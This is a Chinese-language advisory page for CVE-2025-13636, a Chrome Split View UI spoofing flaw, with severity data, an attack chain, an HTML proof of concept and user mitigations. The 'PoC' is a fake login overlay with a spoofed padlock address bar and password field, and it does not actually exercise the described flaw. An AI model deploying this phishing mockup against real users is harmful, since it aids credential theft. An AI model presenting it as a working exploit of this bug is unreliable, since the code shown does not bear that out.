CVE-2025-13636 Google Chrome Split View UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-13636

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2025-13636是Google Chrome浏览器中Split View组件的一个UI欺骗漏洞。该漏洞由Google Chrome安全团队发现并报告，源于Split View功能的不当实现。攻击者可以通过精心设计的域名名称，配合诱导用户执行特定UI手势，在浏览器中呈现虚假的用户界面，从而欺骗用户进行非预期的操作。由于该漏洞需要用户交互才能触发，且主要影响界面的视觉呈现而非系统核心功能，因此被评定为低严重级别的Chromium安全漏洞。CVSS评分为4.3，属于中等威胁级别。漏洞影响Chrome 143.0.7499.41之前的所有版本，攻击者无需特殊权限即可利用此漏洞，但需要通过网络诱骗用户配合特定操作。

技术细节

该漏洞存在于Google Chrome浏览器的Split View功能实现中。Split View是Chrome的一个多任务视图功能，允许用户同时查看和操作多个网页。漏洞的根本原因在于Split View对域名显示的处理存在缺陷，攻击者可以注册包含特殊字符或视觉混淆技术的域名，使域名在地址栏中看起来像是可信网站。当用户被诱导在Split View中打开恶意页面并执行特定手势（如拖拽、滑动等）时，攻击者可以操纵页面布局和视觉元素，制造出虚假的登录框、警告信息或其他UI组件。由于这些虚假元素看起来像是浏览器原生界面的一部分，用户可能会无意中输入敏感信息或点击恶意按钮。攻击的成功依赖于用户交互和特定的手势操作，这降低了自动化的利用可能性，但仍然对普通用户构成威胁。

攻击链分析

STEP 1

步骤1

攻击者注册一个精心设计的域名，利用视觉混淆技术（如IDN同形异义词、特殊Unicode字符）使域名看起来像是可信网站

STEP 2

步骤2

攻击者创建一个包含恶意UI组件的网页，这些组件模仿浏览器原生界面元素，如地址栏、安全锁图标等

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意链接或社交工程手段诱导用户访问该恶意网页

STEP 4

步骤4

用户打开Split View功能并将恶意页面拖入Split View区域

STEP 5

步骤5

用户执行特定UI手势（如拖拽、调整窗口大小等），触发漏洞利用代码

STEP 6

步骤6

恶意页面利用Split View的域名显示缺陷，呈现虚假的地址栏和UI元素

STEP 7

步骤7

用户误以为是在合法网站上操作，输入敏感信息或执行恶意操作，导致信息泄露或其他安全后果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13636 PoC - Split View UI Spoofing
// This PoC demonstrates the UI spoofing vulnerability in Chrome's Split View
// Note: This is for educational purposes only

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13636 UI Spoofing Demo</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .spoofed-ui {
            position: fixed;
            top: 50px;
            left: 50%;
            transform: translateX(-50%);
            background: #fff;
            border: 1px solid #ccc;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
            z-index: 999999;
        }
        .fake-address-bar {
            background: #f1f3f4;
            padding: 10px;
            border-radius: 4px;
            font-family: monospace;
            margin-bottom: 15px;
        }
        .fake-button {
            background: #4285f4;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
        }
        .warning {
            background: #fef7e0;
            border-left: 4px solid #fbbc04;
            padding: 15px;
            margin: 20px 0;
        }
    </style>
</head>
<body>
    <h1>UI Spoofing Vulnerability Demo</h1>
    <p>Domain: <span id="domain"></span></p>
    
    <div class="spoofed-ui">
        <div class="fake-address-bar">
            🔒 secure-bank.example.com
        </div>
        <p>Please verify your identity:</p>
        <input type="text" placeholder="Username" style="display:block; margin:10px 0; padding:8px; width:200px;">
        <input type="password" placeholder="Password" style="display:block; margin:10px 0; padding:8px; width:200px;">
        <button class="fake-button">Sign In</button>
    </div>
    
    <div class="warning">
        <strong>Educational Warning:</strong> This PoC demonstrates how attackers can
        create fake UI elements that appear to be part of the browser's native interface.
        Always verify the actual URL in the address bar before entering credentials.
    </div>
    
    <script>
        document.getElementById('domain').textContent = window.location.hostname;
        
        // Simulate Split View detection
        if (window.innerWidth > 1000) {
            console.log('Split View mode detected');
        }
    </script>
</body>
</html>

影响范围

Google Chrome < 143.0.7499.41

防御指南

临时缓解措施

如果无法立即更新Chrome，用户应避免在Split View模式下打开来自不可信来源的链接，特别是那些看起来像银行、政府或社交媒体网站的域名。始终直接在地址栏输入重要网站的URL，避免点击邮件或消息中的链接。在输入任何敏感信息前，点击地址栏确认实际的域名地址。注意浏览器的安全警告提示，对于任何异常界面行为保持警惕。